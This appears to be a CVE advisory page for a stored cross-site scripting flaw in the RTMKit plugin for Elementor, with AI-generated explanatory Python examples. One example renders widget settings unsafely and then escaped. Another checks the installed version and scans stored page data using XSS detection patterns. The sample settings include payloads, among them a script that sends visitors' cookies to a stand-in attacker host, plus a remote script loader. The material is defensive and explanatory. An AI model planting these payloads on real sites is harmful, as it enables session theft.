CVE-2024-47626
Description
Stored XSS in RTMKit plugin for Elementor (<=1.5.0) allows privileged attackers to inject persistent scripts.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Vulnerability
Overview
The RTMKit plugin (rometheme-for-elementor) for WordPress is vulnerable to Stored Cross-Site Scripting (XSS) due to improper neutralization of user input during web page generation [1]. This issue affects all versions up to and including 1.5.0 [1].
Exploitation
Details
Exploitation requires a privileged user role (such as a contributor or higher) to inject malicious scripts through the plugin's input fields. The injected script is stored on the server and executed in the browser of every visitor who views an affected page [1]. No authentication bypass is involved: the attacker must already hold valid credentials with sufficient permissions.
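The rendering flaw behind this class of bug, shown as an added example rather than the RTMKit plugin's own code: a widget setting that a contributor-level user controls is written into the page verbatim, next to a hardened version that escapes per output context and allowlists URL schemes. The setting names, the payloads and the HTML layout are constructed; the advisory does not name the affected fields.

```python
"""Stored XSS in a widget-rendering path: unsafe output beside neutralized output.

Added example modelling the CWE-79 pattern the advisory describes; it is not
the RTMKit plugin's code. Setting names, payload and markup are constructed.
"""
import html
from urllib.parse import urlsplit

# Constructed widget settings, as a contributor-level user could save them.
# The field names are assumptions; the advisory does not name the real ones.
MALICIOUS_SETTINGS = {
    "title": 'Hello<script>document.location="https://attacker.example/?c="+document.cookie</script>',
    "css_class": 'box" onmouseover="alert(1)',
    "link_url": "javascript:alert(document.domain)",
}


def render_unsafe(settings: dict) -> str:
    """Vulnerable pattern: stored settings concatenated into HTML as-is."""
    return (
        f'<div class="{settings["css_class"]}">'
        f'<a href="{settings["link_url"]}">{settings["title"]}</a></div>'
    )


# Schemes allowed in href; the empty scheme covers relative URLs.
SAFE_URL_SCHEMES = {"http", "https", "mailto", "tel", ""}


def safe_url(value: str) -> str:
    """Keep only http(s)/mailto/tel/relative URLs; anything else becomes empty.

    Browsers ignore tabs and newlines inside a scheme ("java\\tscript:"), so
    those are stripped before the scheme is inspected.
    """
    cleaned = "".join(ch for ch in value.strip() if ch not in "\t\n\r")
    scheme = urlsplit(cleaned).scheme.lower()
    return cleaned if scheme in SAFE_URL_SCHEMES else ""


def render_neutralized(settings: dict) -> str:
    """Hardened pattern: escape each value for the context it lands in."""
    title = html.escape(settings["title"], quote=False)          # HTML body text
    css_class = html.escape(settings["css_class"], quote=True)   # attribute value
    href = html.escape(safe_url(settings["link_url"]), quote=True)  # URL, then attribute
    return f'<div class="{css_class}"><a href="{href}">{title}</a></div>'


if __name__ == "__main__":
    print("unsafe:     ", render_unsafe(MALICIOUS_SETTINGS))
    print("neutralized:", render_neutralized(MALICIOUS_SETTINGS))
```

The point of the split is that body text, attribute values and URLs each need their own treatment: HTML-escaping alone leaves `javascript:` in an `href` fully functional, and escaping `<` and `>` without `"` still lets an attribute value break out into an event handler.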
Impact
A successful attack allows the attacker to inject arbitrary HTML and JavaScript payloads, which can be used to redirect visitors, display advertisements, steal session cookies, or perform other client-side attacks [1]. This can compromise the integrity of the website and potentially lead to further exploitation.
Mitigation
The vulnerability has been patched in version 1.5.1 [1]. Users are strongly advised to update immediately. For those unable to update, a Web Application Firewall (WAF) or assistance from the hosting provider may reduce exposure, but neither replaces the update, which remains the recommended fix [1].
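For the triage that follows an advisory like this one, here is an added example (not code from the plugin or from this page) that flags an installed version in the affected range and then looks for active-content payloads already persisted in page data. It assumes Elementor stores each page's widget tree as JSON in the `_elementor_data` post meta, which is Elementor's convention rather than something the advisory states, and since the affected fields are not named, it inspects every string setting in every widget. The sample rows and the `rtmkit-example` widget type are constructed.

```python
"""Triage for a stored-XSS advisory: version check plus a scan of persisted widget data.

Added example, not the RTMKit plugin's code. Assumes Elementor's `_elementor_data`
post-meta layout (a JSON array of elements with nested "elements" and a "settings"
dict). Sample rows below are constructed; the widget type is hypothetical.
"""
import json
import re

PATCHED_VERSION = (1, 5, 1)  # per the advisory: fixed in 1.5.1


def parse_version(text: str) -> tuple:
    """'1.5.0' -> (1, 5, 0); missing components compare as 0, suffixes are ignored."""
    parts = [int(p) for p in re.findall(r"\d+", text)]
    return tuple(parts + [0] * (3 - len(parts)))[:3]


def is_vulnerable(installed: str) -> bool:
    """True for every release up to and including 1.5.0."""
    return parse_version(installed) < PATCHED_VERSION


# Indicators of injected active content inside a stored string setting.
XSS_PATTERNS = [
    re.compile(r"<\s*(script|iframe|svg|object|embed)\b", re.I),
    re.compile(r"\bon[a-z]{2,}\s*=", re.I),        # inline event handlers
    re.compile(r"(?:java|vb)script\s*:", re.I),    # script URLs
    re.compile(r"data\s*:\s*text/html", re.I),     # data: URLs carrying HTML
]


def scan_elements(elements, post_id, findings):
    """Walk the nested element tree and record settings matching XSS_PATTERNS."""
    for el in elements:
        label = el.get("widgetType") or el.get("elType", "?")
        for key, value in el.get("settings", {}).items():
            if not isinstance(value, str):
                continue
            for pat in XSS_PATTERNS:
                m = pat.search(value)
                if m:
                    findings.append({"post_id": post_id, "widget": label,
                                     "setting": key, "match": m.group(0)})
                    break
        scan_elements(el.get("elements", []), post_id, findings)
    return findings


def scan_postmeta(rows):
    """rows: iterable of (post_id, meta_value) for meta_key = '_elementor_data'."""
    findings = []
    for post_id, meta_value in rows:
        try:
            tree = json.loads(meta_value)
        except json.JSONDecodeError:
            continue  # not Elementor data; skip rather than fail the whole scan
        scan_elements(tree, post_id, findings)
    return findings


# Constructed `_elementor_data` rows: one clean page, one tampered page.
SAMPLE_ROWS = [
    (11, json.dumps([{"elType": "section", "elements": [
        {"elType": "widget", "widgetType": "heading",
         "settings": {"title": "Welcome"}, "elements": []}]}])),
    (12, json.dumps([{"elType": "section", "elements": [
        {"elType": "widget", "widgetType": "rtmkit-example",  # hypothetical widget type
         "settings": {"title": "<script src=//attacker.example/x.js></script>",
                      "link": "javascript:alert(1)"}, "elements": []}]}])),
]


if __name__ == "__main__":
    for v in ("1.4.9", "1.5.0", "1.5.1"):
        print(v, "vulnerable" if is_vulnerable(v) else "patched")
    for f in scan_postmeta(SAMPLE_ROWS):
        print(f)
```

In practice the rows come from `SELECT post_id, meta_value FROM wp_postmeta WHERE meta_key = '_elementor_data'`; the patterns are deliberately broad, so treat hits as leads to inspect, and remember that after updating to 1.5.1 any payload already stored still has to be removed by hand.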
AI Insight generated on May 20, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
- rometheme-for-elementor (RTMKit plugin for Elementor), range: <=1.5.0
Patches
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References
News mentions
No linked articles in our index yet.